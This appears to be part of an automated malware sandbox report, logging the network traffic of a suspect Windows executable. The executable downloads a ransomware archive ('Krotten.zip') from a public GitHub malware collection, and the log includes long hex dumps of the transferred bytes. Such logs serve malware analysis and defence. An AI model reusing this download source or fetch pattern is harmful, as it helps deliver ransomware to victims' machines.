fc 98 16 40 16 5e Data Ascii: `j8q-'a]CnyXx<8eMYz^],3ZNE+\|lY05nz)?:C9_"aI@GFbZUyCf\#!DCU5 r^kSI\|XsR]/)M"R~$qgT55aa/.Z%e 7@^
2022-09-29 12:50:29 UTC	1149	IN	Data Raw: e7 90 e3 3c ac 3b 94 69 03 8f 11 d4 e1 bc 85 c2 be dd 36 41 cc 1b ba 0c 59 86 0f 33 96 9b 38 6b 74 68 42 5c e3 55 81 20 bc c9 e9 35 be 3f 1e 8c b6 82 d1 c4 42 48 d7 45 d2 65 e9 a3 35 15 20 94 67 87 1d 7e 12 74 d4 4d 32 b3 eb 69 a1 46 71 59 22 33 b2 54 0e 18 d9 2c f1 e8 95 a4 8c 64 ba 66 db 2c 07 ad f4 70 6c 09 c5 d4 b9 63 a0 d5 35 fb 81 93 da cc d1 e3 ad 7c d5 8d 35 44 66 78 d0 fa de 95 98 c7 c9 91 2a c1 f1 fb 35 63 65 3b 4d a7 30 ec 40 c5 ad e1 23 8a 79 66 2f 52 b1 28 b7 76 73 f2 ab 3b 4a e0 f4 60 60 fb ad 50 28 6c b1 51 ee cd 69 5b f7 29 ae 4f 35 01 70 4d 35 8f 2d a1 df 57 cc f6 5d b9 3c 40 e1 f5 4a 47 1b 95 4f 60 43 1c 70 a0 7e e1 ab 04 3a a2 01 93 41 ec f2 e6 6b 02 82 22 97 91 8d a4 df 67 48 ee 77 00 e2 c2 ec aa 9c 8b d1 28 07 6a 70 c9 75 18 d0 d6 72 Data Ascii: <;i6AY38kthB\U 5?BHEe5 g~tM2iFqY"3T,df,plc5\|5Dfx*5ce;M0@#yf/R(vs;J``P(lQi[)O5pM5-W]<@JGO`Cp~:Ak"gHw(jpur

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.6	49754	140.82.121.4	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:50:34 UTC	1150	OUT	GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1 Host: github.com
2022-09-29 12:50:35 UTC	1150	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Thu, 29 Sep 2022 12:50:35 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: https://render.githubusercontent.com Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-29 12:50:35 UTC	1151	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.6	49755	185.199.108.133	443	C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp	kBytes transferred	Direction	Data
2022-09-29 12:50:35 UTC	1153	OUT	GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1 Host: raw.githubusercontent.com
2022-09-29 12:50:35 UTC	1153	IN	HTTP/1.1 200 OK Connection: close Content-Length: 26359 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/zip ETag: "b4c9a9caad9a8cc039faac50748e91b4ea099c21f7a0b4b606256ae51df449bc" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 080E:67C0:101BE30:11154D1:6335932F Accept-Ranges: bytes Date: Thu, 29 Sep 2022 12:50:35 GMT Via: 1.1 varnish X-Served-By: cache-mxp6939-MXP X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1664455835.301678,VS0,VE167 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * X-Fastly-Request-ID: 498fbdf1a28d236903ebc8b64a5301ce0d3bba3a Expires: Thu, 29 Sep 2022 12:55:35 GMT Source-Age: 0
2022-09-29 12:50:35 UTC	1153	IN	Data Raw: 50 4b 03 04 33 00 01 00 63 00 cf a3 e4 38 00 00 00 00 2f 66 00 00 29 d5 00 00 16 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 4b 72 6f 74 74 65 6e 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 51 1f 85 1c 8b 3e 2c 09 fa d6 8a ea d4 7d 01 2f 41 8d 8b 07 f0 fd bb 72 93 3d 0e ed 40 4e 7a 13 95 d4 dd 52 47 43 5a fe 98 0e 0e 17 7b 8d 0b 48 2a e1 a6 38 9c 0d 69 c0 a2 4e b7 13 22 57 2e 2b 04 a2 0e 40 b8 3b 45 f0 af 7f 66 fa c6 fd 85 22 c0 6c 99 74 ef 66 9e f4 72 6a d9 dc 4d 40 bf 11 c6 56 7f 5a ef ee 2f ee 69 5e 5a 83 44 c1 e1 ac 9e 0d 4a 58 19 bc d5 4a ed 6d 0f 35 24 46 b4 51 93 93 a8 4a d0 a7 d9 78 fe 72 46 e5 ea dd ae 9f d1 96 48 23 2c 3a 7f d8 74 27 ef d1 37 1b d5 be bd 4a 4b 51 4a c2 83 3d a5 d6 81 75 5c f0 dc 4d 2c f1 64 1c 28 3c 89 b5 e7 cd 2c 29 bf 64 4a f0 Data Ascii: PK3c8/f)Endermanch@Krotten.exeAEQ>,}/Ar=@NzRGCZ{H*8iN"W.+@;Ef"ltfrjM@VZ/i^ZDJXJm5$FQJxrFH#,:t'7JKQJ=u\M,d(<,)dJ
2022-09-29 12:50:35 UTC	1155	IN	Data Raw: 7e 07 d3 91 36 cc 6c 5d e7 86 c4 bb 68 42 cb 46 fd 3d 53 ef 9a 53 c0 07 a2 a2 fb 2d 2a 97 b1 11 17 27 a3 e2 cd e6 8b 85 1d b8 5e 1d 76 5f f8 48 bb 13 ea 13 88 ed e9 39 9b e4 4f 1d 5b 57 77 14 89 a3 33 0d cd 2d 1c a3 b3 8f 4a fb 61 14 c1 c0 39 92 61 fb ba ad 73 31 0e 78 fb 55 f8 ea e5 36 47 f5 37 b6 48 f6 3b 4f 2f 13 bc 87 5e bb f9 a8 84 93 8b 7f aa e9 ba c2 df 48 f0 a1 09 4c f2 2b c0 26 c3 ec ad 2b 27 48 54 35 3e e4 a1 2f 4a f1 e5 3e 63 45 93 59 ee c1 17 10 cf b7 0a 01 bb 2f 3e 40 e2 96 e7 96 1a 65 42 0d b5 43 d2 26 07 82 cd df 4d 59 00 b3 27 c4 5b 05 2d ba 78 12 48 47 84 96 1e 22 12 c6 b7 9a da 78 5f 2a 58 63 aa ab 3e 4c 26 88 77 b3 73 e9 78 ad 2e 31 a3 8d 09 c2 64 6e 25 01 35 42 06 f8 72 fb 72 b0 c2 ea 64 0b a0 18 d6 f5 0e 30 3d a2 29 67 9c d9 e2 58 45 Data Ascii: ~6l]hBF=SS-'^v_H9O[Ww3-Ja9as1xU6G7H;O/^HL+&+'HT5>/J>cEY/>@eBC&MY'[-xHG"x_Xc>L&wsx.1dn%5Brrd0=)gXE
2022-09-29 12:50:35 UTC	1156	IN	Data Raw: ae 9b f4 c8 3e 7a 74 41 7b b8 2e ef b9 95 a5 e1 52 93 e0 18 af 7b b9 ea ba 7b 09 b8 17 56 3d a0 ca 02 f9 9b 23 a6 23 9e 8c 82 2a 51 2d ae fa eb 89 45 7d 46 5a 53 57 b8 c1 6d 3e 2f e7 2c 0f 04 0a 5b 12 53 71 4f 7d 32 3a 8f 94 81 58 12 b4 7e de 48 b5 d8 5e 26 a8 29 8c f2 e7 dd 9e 5c 9b 12 97 03 2f a5 aa ae a6 44 c9 8c 27 5e 3d 44 7f 98 c1 7d b7 eb 24 f4 de 5c bb b7 0e 9a 9b 9b 01 dd 79 93 79 ed 98 38 ee 61 5f aa fe bb 18 d8 3d 45 53 62 54 d1 13 69 5f 7e 2b 69 18 e8 13 16 e4 87 29 83 8f 25 c0 a9 31 16 a8 65 7f 4c 60 16 f1 7e f1 84 12 21 9c eb 16 48 d2 71 8e 2d 24 2e 5b 04 a5 15 05 54 ed 5a 03 e5 b6 e8 b5 fb ab b6 69 c6 44 53 36 d5 c4 68 3c 7c 15 85 3c ef 6d 35 c6 12 10 a5 a8 c2 57 32 ac eb 19 32 2a dd 65 ad ef ab 60 5c 7e a3 75 bb c1 75 12 5b 8a e6 78 62 14 Data Ascii: >ztA{.R{{V=##Q-E}FZSWm>/,[SqO}2:X~H^&)\/D'^=D}$\yy8a_=ESbTi_~+i)%1eL`~!Hq-$.[TZiDS6h<\|<m5W22e`\~uu[xb
2022-09-29 12:50:35 UTC	1157	IN	Data Raw: 63 53 b5 5a bd a6 44 ed d9 02 99 fd 6d 6d ab 31 2c 4d bc f8 f9 95 69 f6 43 4b 13 52 40 19 68 1c b0 8c e2 5a 3a f6 88 cc c7 c6 c8 71 72 db 85 65 79 a0 88 1c 80 52 78 5b 2d dd 51 d6 7f 1d 38 2d d3 5b 59 42 3b f4 13 9d 5c 5d 72 ae 9d eb 83 7c 49 15 9f a8 14 1b 11 da 86 cb a4 f9 88 40 ac dc 36 33 46 30 9a 6e a6 77 18 db 85 67 b2 59 0d a1 be 95 ac 10 10 a4 b7 18 9d e1 0a c5 f8 66 34 91 d0 be f5 c7 25 79 26 b6 65 28 29 29 99 e4 46 c4 88 3e ce 9c 57 ff 55 a8 80 fe 7f fd 7c 98 22 2b 0c 6f d1 cc 8f ec 1c 6c fc c5 e7 86 f8 30 94 c8 d2 bd 71 93 63 53 1c 20 5d 85 ed dc 9f 63 68 db 93 bc 04 40 b0 b5 3c 33 54 17 f8 ea 5c 74 6a 62 3b ab a2 30 36 df 5a 6b df 31 b7 c3 7e 60 ae e4 11 7c d3 d6 8b 46 b1 b7 39 f1 8e 30 4f 4f 1d fa 7a e1 0b 66 74 50 05 fe 6c a9 34 e8 2d 6a 5d Data Ascii: cSZDmm1,MiCKR@hZ:qreyRx[-Q8-[YB;\]r\|I@63F0nwgYf4%y&e())F>WU\|"+ol0qcS ]ch@<3T\tjb;06Zk1~`\|F90OOzftPl4-j]
2022-09-29 12:50:35 UTC	1159	IN	Data Raw: f5 a8 e8 97 c4 0b fe 16 47 d3 16 f6 3a 4f 3b 1c d2 7e 95 8d 8e 11 45 2a 99 15 52 4a c4 71 73 a9 d6 e3 4e 2b a9 78 b3 c5 19 0f ea da 8c 7e e2 e1 75 2e cb e0 4a 03 90 4e 4a a3 9c be 32 22 b2 b8 14 8d fb 10 64 57 4e ae 9f ad 68 fc 78 f9 ca 1f b6 91 ca 2f 0f 5c a4 0c 9a cf 28 74 c9 b8 bb 29 06 db 9a 57 ae 02 18 e5 2b 4f 1c 67 68 f0 5c ee 75 50 2a ee 4a 88 f8 d1 d1 53 8d 23 83 b5 dd 06 61 05 0c 53 e3 a8 92 b2 87 61 f8 f7 c4 58 44 f9 ab 63 b8 2f 84 4d e1 96 55 0f 91 a9 93 5b 57 24 8b dc 32 55 7c 58 b9 04 7a 1a e7 e3 05 2a c1 4b 10 92 2b 70 49 49 5f 46 d1 49 8e c0 61 47 58 4a f1 10 2a 27 a2 e8 1c 68 f9 72 8d 98 93 a8 78 65 8e c1 d5 3f d1 95 f9 16 a0 50 ba a0 f1 dd 58 fd 1c 2a 0d 08 94 13 2f 00 2e 59 f8 17 f2 b3 d2 6c dd 48 6c 60 0e f7 69 40 4f a8 a3 6a a2 ea 2c Data Ascii: G:O;~ERJqsN+x~u.JNJ2"dWNhx/\(t)W+Ogh\uPJS#aSaXDc/MU[W$2U\|XzK+pII_FIaGXJ'hrxe?PX*/.YlHl`i@Oj,
2022-09-29 12:50:35 UTC	1160	IN	Data Raw: ba 77 e6 2f d6 40 2b 3a c1 10 19 77 c3 68 7f d4 d8 45 87 3c d6 57 f7 ec 4a d5 22 af 4e f8 57 c0 27 85 f5 df 71 1b b8 86 72 f0 d7 e8 69 db 35 76 2f ab ad 22 d7 be 42 85 02 6e 01 ac 30 c4 0b e7 a3 fa ef b1 e9 08 b9 a1 2d 2d 1b e7 18 57 f9 cc 25 5d 9b 96 81 bc 22 13 0a db 67 3d 05 e2 85 0b 4b 29 b6 7d 64 33 99 b2 71 e0 33 ba 56 7a ef 26 80 3c dd b1 b1 d3 cc d8 20 b7 3c 7e 97 e3 c1 ed a9 aa a0 fa d7 7f fc b0 2a 94 79 29 28 fa 3a a7 85 7d 7e f8 3d 2d ee 4e 1a 51 20 c6 22 75 56 77 ef e2 62 e0 05 7f 4c 66 b1 bf eb 6b 33 fe 39 e9 7e e3 eb 62 ce db 96 59 34 96 ac 7e 89 af 4c 57 a4 57 89 bb b0 cb 2a b8 35 e8 1f 37 68 b9 3a 91 80 aa be de f9 e4 67 8a a8 01 7a c4 81 7f cc 63 47 60 d5 20 10 bb ae c6 30 98 bc b1 e6 0e 64 60 62 63 a0 ee 94 f9 97 77 52 da dd 0c 2d 6a 6a Data Ascii: w/@+:whE<WJ"NW'qri5v/"Bn0--W%]"g=K)}d3q3Vz&< <~y)(:}~=-NQ "uVwbLfk39~bY4~LWW57h:gzcG` 0d`bcwR-jj
2022-09-29 12:50:35 UTC	1162	IN	Data Raw: e6 9c df 45 c9 81 e1 73 37 b0 b9 ee bf 4e 78 de ca cb 4c 4e cc e7 5d 75 ee 15 e9 94 8a 0d 0e 8a 83 83 7e 52 a2 17 35 f7 ff 3d 12 48 9e 38 cb 3c 1c d7 36 54 6a b4 c9 6c 2d c7 77 58 2b 60 ef 2d 09 43 26 d1 2f 6c b3 70 b3 d7 e5 7c 72 40 35 41 62 fd 85 d5 b8 5e ca 49 ff 22 eb cc 42 47 7d 91 08 5b 76 37 2a a7 c5 0d ff 9a a5 10 0c e6 6e e9 e5 b4 80 4c f5 32 cc b1 89 1c e8 72 fa b3 2a 7f 4c fc da 58 ae 76 51 6d a3 09 71 26 ff b2 a6 f4 bc 77 77 92 27 3d c2 64 9b 0d 0e be bc 21 54 6e 9c 7d 0c 93 3f 39 e9 0f 86 9c 08 87 6e b5 33 8a 1c d9 f7 44 1f 16 40 3e 22 fb a1 84 97 d5 c7 fb 11 c7 a7 07 9f ad b4 97 5c 4d bc 58 dc 0b 0c c8 a7 7c 1b d4 aa 61 56 78 81 78 94 e6 84 9d 1a 7a b8 2e fe 9f ab 08 a2 fe f6 2d 53 ee 45 34 40 b7 59 ee c8 f2 6a ae cc cb ad d7 28 70 08 01 77 Data Ascii: Es7NxLN]u~R5=H8<6Tjl-wX+`-C&/lp\|r@5Ab^I"BG}[v7nL2rLXvQmq&ww'=d!Tn}?9n3D@>"\MX\|aVxxz.-SE4@Yj(pw
2022-09-29 12:50:35 UTC	1163	IN	Data Raw: 3b 7f 40 3b d1 ff 3b 95 d0 c1 af ab fa cb a9 83 a6 ac f8 7f b2 1e a2 b3 72 4e cc fa bb d1 99 3f 90 a2 b2 10 c6 44 3c 53 d0 2a 28 26 f7 e1 65 28 c2 18 9d 41 5e b8 81 6c ac c5 83 15 09 00 62 bf e8 b5 03 57 75 05 ac ed d3 db 48 4e 7a 1f d8 11 73 e7 8f 72 19 8c 50 7a 52 27 d2 af d8 64 fe 67 9b cc c2 9e f4 a8 bd 13 41 7e ab 73 ff ed e1 af b7 eb 1d a9 31 43 ee ad c4 bc ab 2d 49 27 ee 80 3d c4 b7 45 dc c8 bf 8f 4c dc 86 50 ee fd 5f 65 9e 77 09 b5 d2 3a 22 39 f9 7f 26 6a a2 52 a6 39 0f 78 e3 64 69 9c 5e 4d 2a e5 23 cd 88 ff 51 43 e7 4d c4 a7 81 c1 66 f8 6c a4 a2 0d be 5d 59 a9 d9 c4 8d 5c 45 0f 40 3f 72 f7 66 8d ef f4 56 61 8d 29 4b db 3c b8 25 01 d8 54 c4 89 80 f8 da 4d cc fb c2 31 4d fe 33 bd ae bf 2b ff 99 45 8e b3 2a be b8 9f b7 63 c1 c2 50 72 fb 58 e8 24 e3 Data Ascii: ;@;;rN?D<S(&e(A^lbWuHNzsrPzR'dgA~s1C-I'=ELP_ew:"9&jR9xdi^M#QCMfl]Y\E@?rfVa)K<%TM1M3+E*cPrX$
2022-09-29 12:50:35 UTC	1164	IN	Data Raw: 28 9b 60 1e 71 b8 90 ee e6 49 14 f3 4c 4a 84 4d 24 40 91 9b 4a c8 8a 32 04 2c 23 f2 a5 55 2c 3a aa 65 3e 2d d2 4e f9 de 40 b9 c2 98 2e f2 35 b1 e7 f9 fb b1 12 b3 ca b8 75 3e ab 61 b9 8b 73 9b 1a e0 57 f4 39 39 ba 5f 35 80 61 23 90 86 0e c4 2e e8 12 7d 89 5b ac 2e 27 0e 1c 33 76 67 be 99 31 ce 75 23 0d 55 eb 67 aa 91 2f bd 76 13 97 92 61 58 52 20 42 05 c4 20 2b 18 ec 4a 9f ba 42 70 93 9e 72 9e 75 7b 42 09 0e 09 50 fc 92 5e 95 05 f2 b3 f3 ec 94 7a 2d ea c1 05 07 99 d2 7c c2 0f 06 96 5b 48 13 e9 92 f4 8b 89 b3 9a 7c 26 a5 27 06 78 2a f2 a9 b7 02 18 2a f9 af 29 b4 42 be bf d9 b4 1f da da 22 2f 0e 7c 10 b4 76 fd c5 74 94 ac 39 04 9e ff 9a f5 c7 b1 9c 5c 97 34 92 b7 75 07 72 ec 1a 1f 1e 82 b2 e3 30 96 47 ba 11 ce e0 07 01 6e bb be 65 f2 7f fd b5 c3 d5 23 ce 8d Data Ascii: (`qILJM$@J2,#U,:e>-N@.5u>asW99_5a#.}[.'3vg1u#Ug/vaXR B +JBpru{BP^z-\|[H\|&'x**)B"/\|vt9\4ur0Gne#
2022-09-29 12:50:35 UTC	1166	IN	Data Raw: c7 11 83 83 4a d7 2f 05 22 24 93 49 ef 67 7e 71 b7 11 82 b1 65 d9 e8 5c b9 f1 a0 5c b0 d2 9d e8 f0 a0 a3 b6 47 b0 39 68 91 ca f0 09 55 d8 bc 30 8d d3 99 af b8 86 0b 29 c8 e1 7b 72 4f 12 a5 23 32 65 ac 6c 52 67 9f ee 69 11 f6 57 a0 fd 2e 11 5d 91 cb ce 0f ba 60 65 4d ca 8b 93 b3 9b a1 9c 73 0b 1a 59 aa 66 c8 3b 43 6d bf 99 c4 e3 2a 1d 23 bd e5 85 de 96 b9 59 ba 21 74 09 22 2f 61 7d 8a b8 ea 4d 9c ac 15 5d 2d a3 85 61 b9 87 f4 16 54 88 93 e7 4e 9b 79 fb 79 25 9b 51 7d 00 e9 15 90 4d 90 a8 0b b5 28 43 05 34 1a ad 6e 2c f3 e3 ad 4a 76 1e e7 ec f4 2f 4d 6d 77 dc e1 03 19 ef 7a 47 9b a0 2d f3 64 a0 b0 71 6e f4 dc 97 80 f8 48 90 0b 07 7f dd 86 97 d4 a3 fa d4 0c 10 ff 9f e9 f6 48 1a 47 d0 7b 51 6a 30 53 3f 6f 81 8a 9c 0e e8 67 56 16 e8 6b 4f c7 85 35 c0 f3 5b 9c Data Ascii: J/"$Ig~qe\\G9hU0){rO#2elRgiW.]`eMsYf;Cm*#Y!t"/a}M]-aTNyy%Q}M(C4n,Jv/MmwzG-dqnHHG{Qj0S?ogVkO5[
2022-09-29 12:50:35 UTC	1167	IN	Data Raw: 77 8f 84 bc 58 35 a6 bb 88 b1 f0 db af e7 13 aa 31 8b cb bc 9f d7 06 04 7f 3c 6c 70 95 f0 80 fc 2d 7f 89 b3 52 fd df 59 3f c7 32 f4 8b ab 20 1a 82 83 29 d6 3e 64 7e 5a 61 f2 2d 31 66 e1 c6 20 8d 20 1c 4d f1 79 7c af 83 cf ac 52 d2 3d 4c 88 0f 06 e1 5a 9d b4 25 83 d2 d4 b5 72 e3 8a f7 63 88 67 a2 98 9e c5 0a bd 7c e1 5c 79 7a 55 f2 c1 12 89 08 68 14 41 9d 2e f6 27 ce fb 04 c3 9f b5 91 46 95 d8 e2 d7 24 de b9 f1 06 c0 e7 1a 49 35 66 05 90 4b ea b0 ad a9 c7 c9 2d fc d9 4e 92 83 37 94 92 46 9e 0f 46 33 6b c9 c9 1f b2 b6 0d 8c ba 5c 42 30 84 72 d2 91 ec 9b d8 bd 5d 9c 89 db fd 83 a9 60 44 a5 86 2d d9 cd b1 3b e4 71 5f 33 ce a8 8d be a3 37 3d f0 6f 4c 72 49 a4 1b 10 56 a3 3b ac ff cb b2 9a 8c 60 8d 51 20 05 9d 2e 29 46 f1 b8 8f 41 1c 11 59 85 8b 74 20 97 0f 1a Data Ascii: wX51<lp-RY?2 )>d~Za-1f My\|R=LZ%rcg\|\yzUhA.'F$I5fK-N7FF3k\B0r]`D-;q_37=oLrIV;`Q .)FAYt
2022-09-29 12:50:35 UTC	1168	IN	Data Raw: 9c 6d f9 e7 6a 05 78 60 43 3a ae 4f c8 bd d4 99 fd 43 25 bb 0c 43 ce 48 67 45 23 bd 54 ed 8b 01 b0 2b 2d 16 56 55 a5 bb 5b 09 1b ca 3c 84 d9 3a af 4d ae 6c 80 a4 53 18 ea fc 3e fe 7c 59 a4 1d 5f 33 aa 13 67 82 b4 b9 b1 bf 28 19 71 1b 8a 00 16 19 1f b2 20 fa 2c 6a 68 77 e5 96 dc fc 38 76 0e 91 72 c6 fb 40 5c ef 1a ed 71 42 1d e2 23 47 17 13 35 36 ae 59 9b 79 56 b7 64 84 0b 27 53 d4 7c d7 4c bc 92 89 2a bb b4 4b 8b c1 0a 37 4b 06 50 05 1e 8c 9a 41 c7 95 50 4d 16 62 5b 53 d7 d4 c5 61 b3 03 ee 8e 90 d9 81 ff b1 b9 48 86 43 a5 6a 5e ee 47 da a4 b9 6f df d5 8c 61 3d 0a a2 8f 95 c4 5b 58 e4 02 2b 8f ec 45 01 7c d1 99 5a 40 5f 85 5d 4f 3d 31 39 62 0b dc 6f 1b 2b d6 75 c0 c1 b1 ac 30 cc af f7 8a ca 2d 87 70 d0 22 83 21 b6 55 85 86 09 f2 91 bf 93 05 7f 7d f2 ac 4b Data Ascii: mjx`C:OC%CHgE#T+-VU[<:MlS>\|Y_3g(q ,jhw8vr@\qB#G56YyVd'S\|L*K7KPAPMb[SaHCj^Goa=[X+E\|Z@_]O=19bo+u0-p"!U}K
2022-09-29 12:50:35 UTC	1170	IN	Data Raw: d7 96 a6 46 21 be c7 f2 21 a3 17 81 67 78 5e 72 29 0d 1a dd 0a 8a 99 bc 10 73 a9 4f fa 66 b2 0f e5 7f 8a e7 10 cc c6 2d 66 a8 c3 86 dc 08 95 19 fe e5 ee 6b 41 f8 83 0f a8 b8 c8 43 8f 14 8b df 5a 81 1c e8 81 ef 12 93 91 31 ba db 04 06 9f c0 9e 08 1d 85 38 c3 ea 6e ff a3 a2 09 9d 5d cb a1 05 62 cd 88 bd 83 37 74 f6 a3 db 27 5a e2 4c 7e 7c aa 58 3f 2a e6 3e 9e 76 16 95 c9 9d aa 9c 5b bf b9 f3 47 18 96 89 5c 34 1f 60 cf ae 4d 8c 5b 20 0d 5c 89 64 d8 3d 37 37 33 b2 31 24 d9 7c b5 b7 4e 0c ea b7 56 a6 0f e9 d6 20 2a 7f 6d 69 07 a2 c0 24 1c 79 8f b8 82 2e 64 64 57 97 73 84 d2 7f ee 46 cb c0 0c 83 b0 f9 26 29 54 3d e8 53 98 58 c1 73 b7 69 82 27 c2 a9 13 80 d1 11 e8 ae 22 b9 1f b2 95 3d 4e 62 e9 45 30 ac 17 d4 9f 86 6c a1 c6 18 63 49 bf 92 97 fe e6 0c 6a 16 d4 39 Data Ascii: F!!gx^r)sOf-fkACZ18n]b7t'ZL~\|X?>v[G\4`M[ \d=7731$\|NV mi$y.ddWsF&)T=SXsi'"=NbE0lcIj9
2022-09-29 12:50:35 UTC	1171	IN	Data Raw: 02 9a 22 b8 f6 25 46 e6 92 c6 c7 d0 61 44 a3 68 46 c4 1f 19 e1 2a 37 2e b5 b7 4b 2a 7c 77 ce 54 99 5f 92 0c 2d 57 2b 38 af a3 28 a9 93 ed a4 b8 f5 09 73 7d 87 89 01 7a 67 11 61 e5 43 33 d8 11 2a ff 38 f0 1d 34 f6 a8 79 d8 7d 0f 31 aa 73 0e 01 4e f2 f9 e6 8e f0 03 78 28 52 cd 59 1a 68 49 01 a5 7f 25 55 9d 22 7e f8 a2 56 ce ab 8e 7c e3 47 fd da 98 67 97 a8 53 fe 0c 6d fc 6f f0 35 6a 3d 79 3f 93 12 8f 29 a3 54 1c f6 52 8e 9f c6 07 53 28 d1 f0 68 90 ba 5d 0c 9a 81 3b 57 7b 1e 9b 2c ff c1 e3 af b0 2e 74 7f 5c 8c 5e 92 96 a3 9b 1b ec 80 b7 8d 11 ac 4e db 29 ea 4e 5c 59 18 32 30 33 ea 7b 8d 15 f1 36 84 28 a7 e1 66 9b e6 1d 36 9c f1 60 e4 96 ad 21 3c 88 e2 0d ef 56 36 d4 d0 55 ad c0 29 c9 af c1 a2 93 b3 49 a0 65 67 a8 e9 d4 09 8a a2 0e 3d 40 01 af 7e 5c 85 be d5 Data Ascii: "%FaDhF7.K\|wT_-W+8(s}zgaC3*84y}1sNx(RYhI%U"~V\|GgSmo5j=y?)TRS(h];W{,.t\^N)N\Y203{6(f6`!<V6U)Ieg=@~\
2022-09-29 12:50:35 UTC	1172	IN	Data Raw: 42 ed eb 45 40 35 67 37 57 46 41 1a 8a 91 83 30 af 50 3f d9 42 75 66 6c 9d 73 bb 34 17 69 bd 92 12 f2 8b 7a 42 97 0f de b6 07 f8 cf bd 92 f1 47 67 a9 73 96 54 96 75 5f bd f6 13 d3 60 68 cd c8 1b 33 72 2b ec bb c3 63 e5 2b 89 d6 d7 bf bc e0 88 28 b6 83 d0 41 3d 5b 82 76 86 6d 7d b9 3a 2c ae e1 10 96 7c 02 1b e3 46 ee 6d 55 66 26 bf 5f 18 dc 3f 01 d2 b0 03 d6 c4 4a 0b ec 37 25 9f 3f 5f f6 f0 7d a7 f9 44 23 83 a7 74 0d ce b3 18 44 0b 01 15 76 76 85 8b e0 a5 23 0e 02 41 86 8f be 4c b1 f8 71 78 d8 26 ea 36 2c 6e 94 15 10 a0 f7 bf 1b 0d 01 69 f2 ee 2d 06 3d 4e 71 19 74 a8 16 c8 44 4f f5 21 95 16 74 26 38 fb 43 c8 6b a9 3f 7c c5 00 17 4f e2 6b 10 6b cb 63 41 3d 11 8f d0 31 43 46 38 16 50 5d 58 5b 84 7f 0a a2 d0 36 c5 e9 98 80 d2 b8 5e f8 f2 37 4c 11 7f 08 db e3 Data Ascii: BE@5g7WFA0P?Bufls4izBGgsTu_`h3r+c+(A=[vm}:,\|FmUf&_?J7%?_}D#tDvv#ALqx&6,ni-=NqtDO!t&8Ck?\|OkkcA=1CF8P]X[6^7L
2022-09-29 12:50:35 UTC	1174	IN	Data Raw: 1f d2 bf af bb ab 3f fc ee d8 b7 6b 90 7a 92 89 d2 1b 17 4a bb ee 58 52 e7 b3 02 5f 6a 3e ac b4 d5 f6 67 a1 b1 13 0b 5a cf 82 3c a4 a4 58 fa 2d b0 68 46 3e ac 26 fd c9 f1 45 68 27 09 69 f6 57 b4 f1 9f 74 9d 29 92 b6 2d cc e0 4f 92 f8 32 e8 30 d1 88 ce ee 93 f5 84 75 d3 47 60 3c 07 bc 20 19 ad dc b6 26 ab 26 92 50 6e ff b7 ca a5 ce 19 f2 1f 99 16 63 93 d8 a0 48 eb bc 52 a4 f1 06 5c 0a 58 20 e1 c0 85 12 8d 1c 12 d3 cc 8b bd aa 83 13 1b d7 f3 b7 78 fa 32 9d 59 06 ad 47 15 65 ac 71 94 34 2b 31 c4 76 9c 2e 7b 12 c9 97 56 fb 85 16 81 85 bf ac 48 28 fe 53 64 68 61 7a 58 82 66 51 27 c4 6f c9 48 17 64 4a fb 96 3b 6d ac b1 06 25 33 cf 16 d9 3e 34 32 9a ab 14 f0 69 75 14 8d d4 de 44 20 c1 88 e9 d2 a1 75 d8 9d e1 56 41 99 c3 be b0 26 e1 94 6d a5 e7 b8 f9 31 ae ba 32 Data Ascii: ?kzJXR_j>gZ<X-hF>&Eh'iWt)-O20uG`< &&PncHR\X x2YGeq4+1v.{VH(SdhazXfQ'oHdJ;m%3>42iuD uVA&m12
